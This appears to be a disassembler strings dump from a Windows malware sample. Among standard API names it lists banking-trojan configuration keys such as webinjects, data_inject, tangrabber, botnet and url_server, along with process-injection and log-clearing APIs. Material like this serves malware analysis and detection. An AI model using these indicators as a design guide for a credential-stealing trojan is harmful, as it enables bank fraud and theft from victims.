.text:0041D954 0000001B C ImpersonateNamedPipeClient

.text:0041D970 00000018 C ImpersonateLoggedOnUser

.text:0041D988 0000000D C GetUserNameW

.text:0041D998 0000000D C GetUserNameA

.text:0041D9A8 00000010 C GetTrusteeTypeW

.text:0041D9B8 00000010 C GetTrusteeTypeA

.text:0041D9C8 00000010 C GetTrusteeNameW

.text:0041D9D8 00000010 C GetTrusteeNameA

.text:0041D9E8 00000014 C GetTokenInformation

.text:0041D9FC 00000018 C GetSidSubAuthorityCount

.text:0041DA14 00000013 C GetSidSubAuthority

.text:0041DA28 00000015 C GetSidLengthRequired

.text:0041DA40 0000001A C GetSidIdentifierAuthority

.text:0041DA5C 00000013 C GetServiceKeyNameW

.text:0041DA70 00000013 C GetServiceKeyNameA

.text:0041DA84 00000017 C GetServiceDisplayNameW

.text:0041DA9C 00000017 C GetServiceDisplayNameA

.text:0041DAB4 00000013 C GetSecurityInfoExW

.text:0041DAC8 00000013 C GetSecurityInfoExA

.text:0041DADC 00000010 C GetSecurityInfo

.text:0041DAEC 0000001A C GetSecurityDescriptorSacl

.text:0041DB08 0000001B C GetSecurityDescriptorOwner

.text:0041DB24 0000001C C GetSecurityDescriptorLength

.text:0041DB40 0000001B C GetSecurityDescriptorGroup

.text:0041DB5C 0000001A C GetSecurityDescriptorDacl

.text:0041DB78 0000001D C GetSecurityDescriptorControl

.text:0041DB98 00000019 C GetPrivateObjectSecurity

.text:0041DBB4 0000001B C GetOverlappedAccessResults

.text:0041DBD0 00000018 C GetOldestEventLogRecord

.text:0041DBE8 0000001B C GetNumberOfEventLogRecords

.text:0041DC04 00000016 C GetNamedSecurityInfoW

.text:0041DC1C 00000018 C GetNamedSecurityInfoExW

.text:0041DC34 00000018 C GetNamedSecurityInfoExA

.text:0041DC4C 00000016 C GetNamedSecurityInfoA

.text:0041DC64 00000014 C GetMultipleTrusteeW

.text:0041DC78 0000001D C GetMultipleTrusteeOperationW

.text:0041DC98 0000001D C GetMultipleTrusteeOperationA

.text:0041DCB8 00000014 C GetMultipleTrusteeA

.text:0041DCCC 0000000D C GetLengthSid

.text:0041DCDC 00000018 C GetKernelObjectSecurity

.text:0041DCF4 00000011 C GetFileSecurityW

.text:0041DD08 00000011 C GetFileSecurityA

.text:00405C94 00000012 C FindCloseUrlCache

.text:00405CA8 00000017 C FindNextUrlCacheEntryW

.text:00405CC0 00000018 C FindFirstUrlCacheEntryW

.text:00405CD8 00000013 C InternetSetOptionA

.text:00405CEC 0000001A C InternetSetStatusCallback

.text:00405D08 00000016 C GetUrlCacheEntryInfoW

.text:00405D20 00000017 C HttpAddRequestHeadersA

.text:00405D38 00000017 C HttpAddRequestHeadersW

.text:00405D50 00000015 C InternetQueryOptionA

.text:00405D68 00000019 C InternetCheckConnectionA

.text:00405D84 00000012 C InternetCrackUrlA

.text:00405D98 00000011 C HttpOpenRequestA

.text:00405DAC 00000011 C InternetConnectA

.text:00405DC0 00000011 C InternetOpenUrlA

.text:00405DD4 0000000E C InternetOpenA

.text:00405DE4 00000013 C InternetGetCookieA

.text:00405DF8 00000015 C GetModuleFileNameExW

.text:00405E10 0000000D C SHDeleteKeyA

.text:00405E20 0000000F C PathMatchSpecW

.text:00405E30 00000014 C PathRemoveFileSpecW

.text:00405E44 00000010 C PathFileExistsW

.text:00405E54 0000000E C PathSkipRootW

.text:00405E64 00000015 C PathRemoveBackslashW

.text:00405E7C 00000012 C PathAddExtensionW

.text:00405E90 00000012 C PathAddBackslashW

.text:00405EA4 00000012 C PathFindFileNameW

.text:00405EB8 0000000D C PathCombineW

.text:00405EC8 0000000B C wnsprintfA

.text:00405ED4 0000000B C wnsprintfW

.text:00405EE0 0000000C C wvnsprintfA

.text:00405EEC 0000000C C wvnsprintfW

.text:00405EF8 0000000A C StrCmpNIW

.text:00405F04 0000000A C StrCmpNIA

.text:00405F10 00000009 C StrStrIA

.text:00405F1C 00000008 C StrStrW

.text:00405F24 00000014 C RtlCreateUserThread

.text:00405F38 00000010 C LdrGetDllHandle

.text:00405F48 0000001A C NtQueryInformationProcess

.text:00405F64 0000000D C NtCreateFile

.text:00405F74 0000000E C NtQueryObject

.text:00405F84 0000000E C ShellExecuteW

.text:00405F94 00000011 C SHGetFolderPathW

.text:00405FA8 00000018 C SHGetSpecialFolderPathW

.text:00405FC0 0000000E C FindResourceW

.text:00405FD0 0000001A C ExpandEnvironmentStringsW

.text:00405FEC 0000000D C GlobalUnlock

.text:00405FFC 0000000B C GlobalLock

.text:00406008 0000000C C GetFileTime

.text:00406014 0000000C C SetFileTime

.text:00406020 00000011 C GetComputerNameW

.text:00406034 0000000A C FindClose

.text:00406040 0000000E C FindNextFileW

.text:00406050 0000000F C FindFirstFileW

.text:00406060 00000011 C GetTempFileNameW

.text:00406074 00000015 C SystemTimeToFileTime

.text:0040608C 0000000E C GetSystemTime

.text:0040609C 00000015 C LeaveCriticalSection

.text:004060B4 00000015 C EnterCriticalSection

.text:004060CC 0000001A C InitializeCriticalSection

.text:004060E8 00000012 C ReadProcessMemory

.text:004060FC 0000000D C SetLastError

.text:0040610C 0000000E C IsBadWritePtr

.text:0040611C 0000000D C IsBadReadPtr

.text:0040612C 0000000D C GetTempPathW

.text:0040613C 00000011 C CreateDirectoryW

.text:00406150 0000000C C MoveFileExW

.text:0040615C 00000014 C WideCharToMultiByte

.text:00406170 00000014 C MultiByteToWideChar

.text:00406184 00000010 C GetProcessTimes

.text:00406194 0000000F C CreateProcessW

.text:0041DD1C 0000001B C GetExplicitEntriesFromAclW

.text:0041DD38 0000001B C GetExplicitEntriesFromAclA

.text:0041DD54 0000001B C GetEffectiveRightsFromAclW

.text:0041DD70 0000001B C GetEffectiveRightsFromAclA

.text:0041DD8C 00000015 C GetCurrentHwProfileW

.text:0041DDA4 00000015 C GetCurrentHwProfileA

.text:0041DDBC 0000001E C GetAuditedPermissionsFromAclW

.text:0041DDDC 0000001E C GetAuditedPermissionsFromAclA

.text:0041DDFC 00000012 C GetAclInformation

.text:0041DE10 00000007 C GetAce

.text:0041DE18 0000001F C GetAccessPermissionsForObjectW

.text:0041DE38 0000001F C GetAccessPermissionsForObjectA

.text:0041DE58 00000008 C FreeSid

.text:0041DE60 00000011 C FindFirstFreeAce

.text:0041DE74 00000009 C EqualSid

.text:0041DE80 0000000F C EqualPrefixSid

.text:0041DE90 00000014 C EnumServicesStatusW

.text:0041DEA4 00000014 C EnumServicesStatusA

.text:0041DEB8 00000017 C EnumDependentServicesW

.text:0041DED0 00000017 C EnumDependentServicesA

.text:0041DEE8 00000011 C DuplicateTokenEx

.text:0041DEFC 0000000F C DuplicateToken

.text:0041DF0C 0000001D C DestroyPrivateObjectSecurity

.text:0041DF2C 00000016 C DeregisterEventSource

.text:0041DF44 0000000E C DeleteService

.text:0041DF54 0000000A C DeleteAce

.text:0041DF60 00000016 C CryptVerifySignatureW

.text:0041DF78 00000016 C CryptVerifySignatureA

.text:0041DF90 0000000F C CryptSignHashW

.text:0041DFA0 0000000F C CryptSignHashA

.text:0041DFB0 00000012 C CryptSetProviderW

.text:0041DFC4 00000014 C CryptSetProviderExW

.text:0041DFD8 00000014 C CryptSetProviderExA

.text:0041DFEC 00000012 C CryptSetProviderA

.text:0041E000 00000012 C CryptSetProvParam

.text:0041E014 00000011 C CryptSetKeyParam

.text:0041E028 00000012 C CryptSetHashParam

.text:0041E03C 00000014 C CryptReleaseContext

.text:0041E050 0000000F C CryptImportKey

.text:0041E060 00000014 C CryptHashSessionKey

.text:0041E074 0000000E C CryptHashData

.text:0041E084 00000010 C CryptGetUserKey

.text:0041E094 00000012 C CryptGetProvParam

.text:0041E0A8 00000011 C CryptGetKeyParam

.text:0041E0BC 00000012 C CryptGetHashParam

.text:0041E0D0 00000019 C CryptGetDefaultProviderW

.text:0041E0EC 00000019 C CryptGetDefaultProviderA

.text:0041E108 0000000F C CryptGenRandom

.text:0041E118 0000000C C CryptGenKey

.text:0041E124 0000000F C CryptExportKey

.text:0041E134 00000014 C CryptEnumProvidersW

.text:0041E148 00000014 C CryptEnumProvidersA

.text:0041E15C 00000018 C CryptEnumProviderTypesW

.text:0041E174 00000018 C CryptEnumProviderTypesA

.text:0041E18C 0000000D C CryptEncrypt

.text:0041E19C 00000012 C CryptDuplicateKey

.text:0041E1B0 00000013 C CryptDuplicateHash

.text:0041E1C4 00000010 C CryptDestroyKey

.text:0041E1D4 00000011 C CryptDestroyHash

.text:0041E1E8 0000000F C CryptDeriveKey

.text:0041E1F8 0000000D C CryptDecrypt

.text:0041E208 00000010 C CryptCreateHash

.text:0041E218 00000013 C CryptContextAddRef

.text:0041E22C 00000015 C CryptAcquireContextW

.text:0041E244 00000015 C CryptAcquireContextA

.text:0041E25C 0000000F C CreateServiceW

.text:0041E26C 0000000F C CreateServiceA

.text:0041E27C 00000015 C CreateProcessAsUserW

.text:0041E294 00000015 C CreateProcessAsUserA

.text:0041E2AC 0000001C C CreatePrivateObjectSecurity

.text:004061A4 00000013 C GetCurrentThreadId

.text:004061B8 00000011 C GetCurrentThread

.text:004061CC 00000012 C GetThreadPriority

.text:004061E0 00000012 C SetThreadPriority

.text:004061F4 00000014 C GetCurrentProcessId

.text:00406208 0000000E C VirtualFreeEx

.text:00406218 00000011 C VirtualProtectEx

.text:0040622C 0000000F C VirtualAllocEx

.text:0040623C 0000000F C VirtualQueryEx

.text:0040624C 0000000C C OpenProcess

.text:00406258 0000000C C ExitProcess

.text:00406264 0000000B C ExitThread

.text:00406270 00000013 C GetExitCodeProcess

.text:00406284 0000000D C Thread32Next

.text:00406294 0000000E C Thread32First

.text:004062A4 0000000E C Module32NextW

.text:004062B4 0000000F C Module32FirstW

.text:004062C4 0000000F C Process32NextW

.text:004062D4 00000010 C Process32FirstW

.text:004062E4 00000019 C CreateToolhelp32Snapshot

.text:00406300 00000013 C CreateRemoteThread

.text:00406314 0000000D C CreateThread

.text:00406324 00000013 C WriteProcessMemory

.text:00406338 00000014 C DisconnectNamedPipe

.text:0040634C 0000000D C GetLocalTime

.text:0040635C 00000011 C FlushFileBuffers

.text:00406370 0000000C C GetFileSize

.text:0040637C 0000000D C SetEndOfFile

.text:0040638C 00000009 C ReadFile

.text:00406398 0000000A C WriteFile

.text:004063A4 0000000D C GetTickCount

.text:004063B4 00000011 C CreateNamedPipeW

.text:004063C8 00000018 C SetNamedPipeHandleState

.text:004063E0 0000000F C WaitNamedPipeW

.text:004063F0 00000011 C ConnectNamedPipe

.text:00406404 00000009 C HeapFree

.text:00406410 0000000C C HeapReAlloc

.text:0040641C 0000000A C HeapAlloc

.text:00406428 0000000C C HeapDestroy

.text:00406434 0000000B C HeapCreate

.text:00406440 0000000F C SetFilePointer

.text:00406450 0000000D C CreateEventW

.text:00406460 0000000C C CreateFileW

.text:0040646C 00000009 C SetEvent

.text:00406478 00000014 C WaitForSingleObject

.text:0040648C 00000013 C SetFileAttributesW

.text:004064A0 0000000C C DeleteFileW

.text:004064AC 0000000C C CloseHandle

.text:004064B8 00000009 C lstrcatA

.text:004064C4 00000009 C lstrcatW

.text:004064D0 00000009 C lstrcpyA

.text:004064DC 0000000A C lstrcpynA

.text:004064E8 0000000A C lstrcpynW

.text:004064F4 00000009 C lstrcpyW

.text:00406500 0000000A C lstrcmpiA

.text:0040650C 0000000A C lstrcmpiW

.text:00406518 0000000D C ReleaseMutex

.text:00406528 0000000B C OpenMutexW

.text:00406534 0000000D C CreateMutexW

.text:00406544 0000000D C GetLastError

.text:00406554 00000011 C SetFilePointerEx

.text:00406568 00000013 C GetModuleFileNameA

.text:0040657C 00000013 C GetModuleFileNameW

.text:00406590 0000000A C CopyFileW

.text:0040659C 00000006 C Sleep

.text:004065A4 00000011 C GetModuleHandleA

.text:004065B8 00000019 C GetUserDefaultUILanguage

.text:004065D4 0000000E C GetVersionExW

.text:004065E4 00000017 C GetTimeZoneInformation

.text:004065FC 0000000B C ResetEvent

.text:0041E2C8 00000008 C CopySid

.text:0041E2D0 00000023 C ConvertSecurityDescriptorToAccessW

.text:0041E2F4 00000028 C ConvertSecurityDescriptorToAccessNamedW

.text:0041E31C 00000028 C ConvertSecurityDescriptorToAccessNamedA

.text:0041E344 00000023 C ConvertSecurityDescriptorToAccessA

.text:0041E368 00000023 C ConvertAccessToSecurityDescriptorW

.text:0041E38C 00000023 C ConvertAccessToSecurityDescriptorA

.text:0041E3B0 0000000F C ControlService

.text:0041E3C0 00000013 C CloseServiceHandle

.text:0041E3D4 0000000E C CloseEventLog

.text:0041E3E4 0000000F C ClearEventLogW

.text:0041E3F4 0000000F C ClearEventLogA

.text:0041E404 00000015 C ChangeServiceConfigW

.text:0041E41C 00000015 C ChangeServiceConfigA

.text:0041E434 00000017 C CancelOverlappedAccess

.text:0041E44C 00000015 C BuildTrusteeWithSidW

.text:0041E464 00000015 C BuildTrusteeWithSidA

.text:0041E47C 00000016 C BuildTrusteeWithNameW

.text:0041E494 00000016 C BuildTrusteeWithNameA

.text:0041E4AC 00000019 C BuildSecurityDescriptorW

.text:0041E4C8 00000019 C BuildSecurityDescriptorA

.text:0041E4E4 00000019 C BuildImpersonateTrusteeW

.text:0041E500 00000019 C BuildImpersonateTrusteeA

.text:0041E51C 00000028 C BuildImpersonateExplicitAccessWithNameW

.text:0041E544 00000028 C BuildImpersonateExplicitAccessWithNameA

.text:0041E56C 0000001D C BuildExplicitAccessWithNameW

.text:0041E58C 0000001D C BuildExplicitAccessWithNameA

.text:0041E5AC 00000010 C BackupEventLogW

.text:0041E5BC 00000010 C BackupEventLogA

.text:0041E5CC 00000016 C AreAnyAccessesGranted

.text:0041E5E4 00000016 C AreAllAccessesGranted

.text:0041E5FC 00000018 C AllocateLocallyUniqueId

.text:0041E614 00000019 C AllocateAndInitializeSid

.text:0041E630 00000016 C AdjustTokenPrivileges

.text:0041E648 00000012 C AdjustTokenGroups

.text:0041E65C 00000012 C AddAuditAccessAce

.text:0041E670 00000007 C AddAce

.text:0041E678 00000013 C AddAccessDeniedAce

.text:0041E68C 00000014 C AddAccessAllowedAce

.text:0041E6A0 0000001A C AccessCheckAndAuditAlarmW

.text:0041E6BC 0000001A C AccessCheckAndAuditAlarmA

.text:0041E6D8 0000000C C AccessCheck

.text:0041E6E4 00000015 C AbortSystemShutdownW

.text:0041E6FC 00000015 C AbortSystemShutdownA

.text:0041E714 0000000C C wvnsprintfW

.text:0041E720 0000000C C wvnsprintfA

.text:0041E72C 0000000B C wnsprintfW

.text:0041E738 0000000B C wnsprintfA

.text:0041E744 0000000D C UrlUnescapeW

.text:0041E754 0000000D C UrlUnescapeA

.text:0041E764 00000007 C UrlIsW

.text:0041E76C 0000000D C UrlIsOpaqueW

.text:0041E77C 0000000D C UrlIsOpaqueA

.text:0041E78C 00000010 C UrlIsNoHistoryW

.text:0041E79C 00000010 C UrlIsNoHistoryA

.text:0041E7AC 00000007 C UrlIsA

.text:0041E7B4 00000009 C UrlHashW

.text:0041E7C0 00000009 C UrlHashA

.text:0041E7CC 0000000C C UrlGetPartW

.text:0041E7D8 0000000C C UrlGetPartA

.text:0041E7E4 00000010 C UrlGetLocationW

.text:0041E7F4 00000010 C UrlGetLocationA

.text:0041E804 0000000B C UrlEscapeW

.text:0041E810 0000000B C UrlEscapeA

.text:0041E81C 00000013 C UrlCreateFromPathW

.text:0041E830 00000013 C UrlCreateFromPathA

.text:0041E844 0000000C C UrlCompareW

.text:0041E850 0000000C C UrlCompareA

.text:0041E85C 0000000C C UrlCombineW

.text:0041E868 0000000C C UrlCombineA

.text:00406608 00000010 C UnmapViewOfFile

.text:00406618 0000000E C MapViewOfFile

.text:00406628 00000013 C CreateFileMappingW

.text:0040663C 0000000E C GetFileSizeEx

.text:0040664C 0000000E C GetDriveTypeW

.text:0040665C 00000011 C GetLogicalDrives

.text:00406670 00000010 C GetCommandLineA

.text:00406680 0000000F C GetProcessHeap

.text:00406690 00000013 C GetFileAttributesW

.text:004066A4 0000000D C GetProcessId

.text:004066B4 0000000E C SuspendThread

.text:004066C4 0000000C C FreeLibrary

.text:004066D0 0000000B C OpenThread

.text:004066DC 0000000D C ResumeThread

.text:004066F8 00000005 C text

.text:00406700 00000011 C GetThreadContext

.text:00406714 00000016 C CreateTimerQueueTimer

.text:0040672C 00000016 C FileTimeToDosDateTime

.text:00406744 00000018 C FileTimeToLocalFileTime

.text:0040675C 0000001B C GetFileInformationByHandle

.text:00406778 00000017 C WaitForMultipleObjects

.text:00406790 00000022 C GetVolumeNameForVolumeMountPointW

.text:004067B4 00000014 C GetOverlappedResult

.text:004067C8 00000018 C GetEnvironmentVariableW

.text:004067E0 0000000A C LocalFree

.text:004067EC 0000000F C FormatMessageW

.text:00406FF8 00000012 C WTSQueryUserToken

.text:0040700C 0000000C C userenv.dll

.text:00407018 00000017 C CreateEnvironmentBlock

.text:00407030 00000018 C DestroyEnvironmentBlock

.text:00407070 00000011 C (kd;l;;;;;324j((

.text:004070BC 00000014 C DllUnregisterServer

.text:004070D0 00000012 C DllRegisterServer

.text:004070E4 00000012 C DllGetClassObject

.text:004070F8 00000010 C DllCanUnloadNow

.text:004072DC 0000000A C *<select

.text:004072E8 00000013 C *<option selected

.text:004072FC 00000011 C *<input *value=\"

.text:00407334 00000007 C %%0%uu

.text:004073AC 00000005 C pop3

.text:0040743C 00000038 C Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

.text:00407474 00000009 C HTTP/1.1

.text:00407480 0000000B C urlmon.dll

.text:0040748C 00000016 C ObtainUserAgentString

.text:004074B8 0000000C C cabinet.dll

.text:004074C4 0000000A C FCICreate

.text:004074D0 0000000B C FCIAddFile

.text:004074DC 00000010 C FCIFlushCabinet

.text:004074EC 0000000B C FCIDestroy

.text:00418920 0000000D C staticconfig

.text:00418998 00000007 C botnet

.text:004189E0 0000000D C timer_config

.text:00418A20 0000000B C timer_logs

.text:00418A58 0000000C C timer_stats

.text:00418A94 0000000B C url_config

.text:00418AF8 0000000B C url_compip

.text:00418B5C 0000000F C encryption_key

.text:00418BD8 00000014 C blacklist_languages

.text:00418C4C 00000007 C .data1

.text:00418C54 00000013 C percent_of_overlay

.text:00418C68 0000000E C dynamicconfig

.text:00418C78 0000000B C url_loader

.text:00418CF4 00000008 C set_url

.text:00418CFC 0000000E C data_before\r\n

.text:00418D0C 0000000E C data_inject\r\n

.text:00418D1C 0000000D C data_after\r\n

.text:00418D2C 0000000B C data_end\r\n

.text:00418E9C 0000000B C url_server

.text:00418F3C 0000000F C advancedconfig

.text:0041E874 00000011 C UrlCanonicalizeW

.text:0041E888 00000011 C UrlCanonicalizeA

.text:0041E89C 00000010 C UrlApplySchemeW

.text:0041E8AC 00000010 C UrlApplySchemeA

.text:0041E8BC 00000009 C StrTrimW

.text:0041E8C8 00000009 C StrTrimA

.text:0041E8D4 0000000A C StrToIntW

.text:0041E8E0 0000000C C StrToIntExW

.text:0041E8EC 0000000C C StrToIntExA

.text:0041E8F8 0000000A C StrToIntA

.text:0041E904 00000008 C StrStrW

.text:0041E90C 00000009 C StrStrIW

.text:0041E918 00000009 C StrStrIA

.text:0041E924 00000008 C StrStrA

.text:0041E92C 00000008 C StrSpnW

.text:0041E934 00000008 C StrSpnA

.text:0041E93C 0000000D C StrRetToStrW

.text:0041E94C 0000000D C StrRetToStrA

.text:0041E95C 0000000D C StrRetToBufW

.text:0041E96C 0000000D C StrRetToBufA

.text:0041E97C 0000000A C StrRStrIW

.text:0041E988 0000000A C StrRStrIA

.text:0041E994 00000009 C StrRChrW

.text:0041E9A0 0000000A C StrRChrIW

.text:0041E9AC 0000000A C StrRChrIA

.text:0041E9B8 00000009 C StrRChrA

.text:0041E9C4 00000009 C StrPBrkW

.text:0041E9D0 00000009 C StrPBrkA

.text:0041E9DC 00000009 C StrNCatW

.text:0041E9E8 00000009 C StrNCatA

.text:0041E9F4 00000010 C StrIsIntlEqualW

.text:0041EA04 00000010 C StrIsIntlEqualA

.text:0041EA14 00000015 C StrFromTimeIntervalW

.text:0041EA2C 00000015 C StrFromTimeIntervalA

.text:0041EA44 00000011 C StrFormatKBSizeW

.text:0041EA58 00000011 C StrFormatKBSizeA

.text:0041EA6C 00000013 C StrFormatByteSizeW

.text:0041EA80 00000013 C StrFormatByteSizeA

.text:0041EA94 00000015 C StrFormatByteSize64A

.text:0041EAAC 00000008 C StrDupW

.text:0041EAB4 00000008 C StrDupA

.text:0041EABC 00000008 C StrCpyW

.text:0041EAC4 00000009 C StrCpyNW

.text:0041EAD0 00000008 C StrCmpW

.text:0041EAD8 00000009 C StrCmpNW

.text:0041EAE4 0000000A C StrCmpNIW

.text:0041EAF0 0000000A C StrCmpNIA

.text:0041EAFC 00000009 C StrCmpNA

.text:0041EB08 00000009 C StrCmpIW

.text:0041EB14 00000008 C StrChrW

.text:0041EB1C 00000009 C StrChrIW

.text:0041EB28 00000009 C StrChrIA

.text:0041EB34 00000008 C StrChrA

.text:0041EB3C 00000008 C StrCatW

.text:0041EB44 0000000C C StrCatBuffW

.text:0041EB50 0000000C C StrCatBuffA

.text:0041EB5C 00000009 C StrCSpnW

.text:0041EB68 0000000A C StrCSpnIW

.text:0041EB74 0000000A C StrCSpnIA

.text:0041EB80 00000009 C StrCSpnA

.text:0041EB8C 0000000A C SHStrDupW

.text:0041EB98 0000000A C SHStrDupA

.text:0041EBA4 0000000F C SHSkipJunction

.text:0041EBB4 0000000C C SHSetValueW

.text:0041EBC0 0000000C C SHSetValueA

.text:0041EBCC 0000000F C SHSetThreadRef

.text:0041EBDC 00000013 C SHRegWriteUSValueW

.text:0041EBF0 00000013 C SHRegWriteUSValueA

.text:0041EC04 00000011 C SHRegSetUSValueW

.text:0041EC18 00000011 C SHRegSetUSValueA

.text:00418F4C 00000010 C advancedconfigs

.text:00418F8C 0000000A C webfilter

.text:00418F98 0000000B C webfilters

.text:00418FE0 0000000E C webdatafilter

.text:00418FF0 0000000F C webdatafilters

.text:00419000 00000009 C webfakes

.text:00419064 0000000B C tangrabber

.text:00419100 00000007 C dnsmap

.text:00419108 00000010 C file_webinjects

.text:00419584 00000005 C lexx

.text:00419644 0000000A C ole32.dll

.text:00419650 0000000C C SHLWAPI.dll

.text:0041965C 0000000D C ADVAPI32.dll

.text:0041966C 0000000B C USER32.dll

.text:00419678 0000000D C KERNEL32.dll

.text:00419688 00000012 C WriteStringStream

.text:0041969C 0000000C C WriteOleStg

.text:004196A8 00000014 C WriteFmtUserTypeStg

.text:004196BC 0000000E C WriteClassStm

.text:004196CC 0000000E C WriteClassStg

.text:004196DC 00000010 C UtGetDvtd32Info

.text:004196EC 00000010 C UtGetDvtd16Info

.text:004196FC 00000018 C UtConvertDvtd32toDvtd16

.text:00419714 00000018 C UtConvertDvtd16toDvtd32

.text:0041972C 00000013 C UpdateDCOMSettings

.text:00419740 0000000E C StringFromIID

.text:00419750 00000010 C StringFromGUID2

.text:00419760 00000010 C StringFromCLSID

.text:00419770 0000000C C StgSetTimes

.text:0041977C 0000001B C StgOpenStorageOnILockBytes

.text:00419798 00000011 C StgOpenStorageEx

.text:004197AC 0000000F C StgOpenStorage

.text:004197BC 00000024 C StgOpenAsyncDocfileOnIFillLockBytes

.text:004197E0 00000017 C StgIsStorageILockBytes

.text:004197F8 00000011 C StgIsStorageFile

.text:0041980C 00000021 C StgGetIFillLockBytesOnILockBytes

.text:00419830 0000001B C StgGetIFillLockBytesOnFile

.text:0041984C 00000013 C StgCreateStorageEx

.text:00419860 0000001D C StgCreateDocfileOnILockBytes

.text:00419880 00000011 C StgCreateDocfile

.text:00419894 00000012 C SetDocumentBitStg

.text:004198A8 0000000E C SetConvertStg

.text:004198B8 0000000F C RevokeDragDrop

.text:004198C8 00000011 C ReleaseStgMedium

.text:004198DC 00000011 C RegisterDragDrop

.text:004198F0 00000011 C ReadStringStream

.text:00419904 0000000B C ReadOleStg

.text:00419910 00000013 C ReadFmtUserTypeStg

.text:00419924 0000000D C ReadClassStm

.text:00419934 0000000D C ReadClassStg

.text:00419944 00000010 C PropVariantCopy

.text:00419954 00000011 C PropVariantClear

.text:00419968 00000010 C ProgIDFromCLSID

.text:00419978 00000013 C OpenOrCreateStream

.text:0041998C 00000010 C OleUninitialize

.text:0041999C 00000018 C OleTranslateAccelerator

.text:004199B4 00000015 C OleSetMenuDescriptor

.text:004199CC 00000016 C OleSetContainedObject

.text:004199E4 00000010 C OleSetClipboard

.text:004199F4 00000012 C OleSetAutoConvert

.text:00419A08 00000010 C OleSaveToStream

.text:00419A18 00000008 C OleSave

.text:00419A20 00000007 C OleRun

.text:00419A28 00000012 C OleRegGetUserType

.text:00419A3C 00000014 C OleRegGetMiscStatus

.text:00419A50 00000010 C OleRegEnumVerbs

.text:00419A60 00000014 C OleRegEnumFormatEtc

.text:00419A74 00000015 C OleQueryLinkFromData

.text:00419A8C 00000017 C OleQueryCreateFromData

.text:00419AA4 00000015 C OleNoteObjectVisible

.text:0041EC2C 00000013 C SHRegQueryUSValueW

.text:0041EC40 00000013 C SHRegQueryUSValueA

.text:0041EC54 00000015 C SHRegQueryInfoUSKeyW

.text:0041EC6C 00000015 C SHRegQueryInfoUSKeyA

.text:0041EC84 00000010 C SHRegOpenUSKeyW

.text:0041EC94 00000010 C SHRegOpenUSKeyA

.text:0041ECA4 00000011 C SHRegGetUSValueW

.text:0041ECB8 00000011 C SHRegGetUSValueA

.text:0041ECCC 00000015 C SHRegGetBoolUSValueW

.text:0041ECE4 00000015 C SHRegGetBoolUSValueA

.text:0041ECFC 00000012 C SHRegEnumUSValueW

.text:0041ED10 00000012 C SHRegEnumUSValueA

.text:0041ED24 00000010 C SHRegEnumUSKeyW

.text:0041ED34 00000010 C SHRegEnumUSKeyA

.text:0041ED44 00000013 C SHRegDuplicateHKey

.text:0041ED58 00000014 C SHRegDeleteUSValueW

.text:0041ED6C 00000014 C SHRegDeleteUSValueA

.text:0041ED80 00000017 C SHRegDeleteEmptyUSKeyW

.text:0041ED98 00000017 C SHRegDeleteEmptyUSKeyA

.text:0041EDB0 00000012 C SHRegCreateUSKeyW

.text:0041EDC4 00000012 C SHRegCreateUSKeyA

.text:0041EDD8 00000010 C SHRegCloseUSKey

.text:0041EDE8 00000010 C SHQueryValueExW

.text:0041EDF8 00000010 C SHQueryValueExA

.text:0041EE08 00000010 C SHQueryInfoKeyW

.text:0041EE18 00000010 C SHQueryInfoKeyA

.text:0041EE28 00000011 C SHOpenRegStreamW

.text:0041EE3C 00000011 C SHOpenRegStreamA

.text:0041EE50 00000012 C SHOpenRegStream2W

.text:0041EE64 00000012 C SHOpenRegStream2A

.text:0041EE78 00000015 C SHIsLowMemoryMachine

.text:0041EE90 0000000C C SHGetValueW

.text:0041EE9C 0000000C C SHGetValueA

.text:0041EEA8 0000000F C SHGetThreadRef

.text:0041EEB8 00000011 C SHGetInverseCMAP

.text:0041EECC 0000000D C SHEnumValueW

.text:0041EEDC 0000000D C SHEnumValueA

.text:0041EEEC 0000000D C SHEnumKeyExW

.text:0041EEFC 0000000D C SHEnumKeyExA

.text:0041EF0C 0000000F C SHDeleteValueW

.text:0041EF1C 0000000F C SHDeleteValueA

.text:0041EF2C 0000000D C SHDeleteKeyW

.text:0041EF3C 0000000D C SHDeleteKeyA

.text:0041EF4C 00000012 C SHDeleteEmptyKeyW

.text:0041EF60 00000012 C SHDeleteEmptyKeyA

.text:0041EF74 00000016 C SHCreateStreamOnFileW

.text:0041EF8C 00000016 C SHCreateStreamOnFileA

.text:0041EFA4 00000015 C SHCreateShellPalette

.text:0041EFBC 0000000B C SHCopyKeyW

.text:0041EFC8 0000000B C SHCopyKeyA

.text:0041EFD4 0000000F C SHAutoComplete

.text:0041EFE4 00000013 C PathUnquoteSpacesW

.text:0041EFF8 00000013 C PathUnquoteSpacesA

.text:0041F00C 00000018 C PathUnmakeSystemFolderW

.text:0041F024 00000018 C PathUnmakeSystemFolderA

.text:0041F03C 00000010 C PathUndecorateW

.text:0041F04C 00000010 C PathUndecorateA

.text:0041F05C 00000011 C PathStripToRootW

.text:0041F070 00000011 C PathStripToRootA

.text:0041F084 0000000F C PathStripPathW

.text:0041F094 0000000F C PathStripPathA

.text:0041F0A4 0000000E C PathSkipRootW

.text:0041F0B4 0000000E C PathSkipRootA

.text:0041F0C4 00000014 C PathSetDlgItemPathW

.text:0041F0D8 00000014 C PathSetDlgItemPathA

.text:0041F0EC 00000016 C PathSearchAndQualifyW

.text:0041F104 00000016 C PathSearchAndQualifyA

.text:0041F11C 00000015 C PathRenameExtensionW

.text:0041F134 00000015 C PathRenameExtensionA

.text:0041F14C 00000014 C PathRemoveFileSpecW

.text:00419ABC 00000020 C OleMetafilePictFromIconAndLabel

.text:00419ADC 0000000F C OleLockRunning

.text:00419AEC 00000012 C OleLoadFromStream

.text:00419B00 00000008 C OleLoad

.text:00419B08 0000000D C OleIsRunning

.text:00419B18 00000016 C OleIsCurrentClipboard

.text:00419B30 0000000E C OleInitialize

.text:00419B40 00000011 C OleGetIconOfFile

.text:00419B54 00000012 C OleGetIconOfClass

.text:00419B68 00000010 C OleGetClipboard

.text:00419B78 00000012 C OleGetAutoConvert

.text:00419B8C 00000012 C OleFlushClipboard

.text:00419BA0 00000011 C OleDuplicateData

.text:00419BB4 00000008 C OleDraw

.text:00419BBC 00000011 C OleDoAutoConvert

.text:00419BD0 00000019 C OleDestroyMenuDescriptor

.text:00419BEC 00000018 C OleCreateStaticFromData

.text:00419C04 00000018 C OleCreateMenuDescriptor

.text:00419C1C 00000016 C OleCreateLinkToFileEx

.text:00419C34 00000014 C OleCreateLinkToFile

.text:00419C48 00000018 C OleCreateLinkFromDataEx

.text:00419C60 00000016 C OleCreateLinkFromData

.text:00419C78 00000010 C OleCreateLinkEx

.text:00419C88 0000000E C OleCreateLink

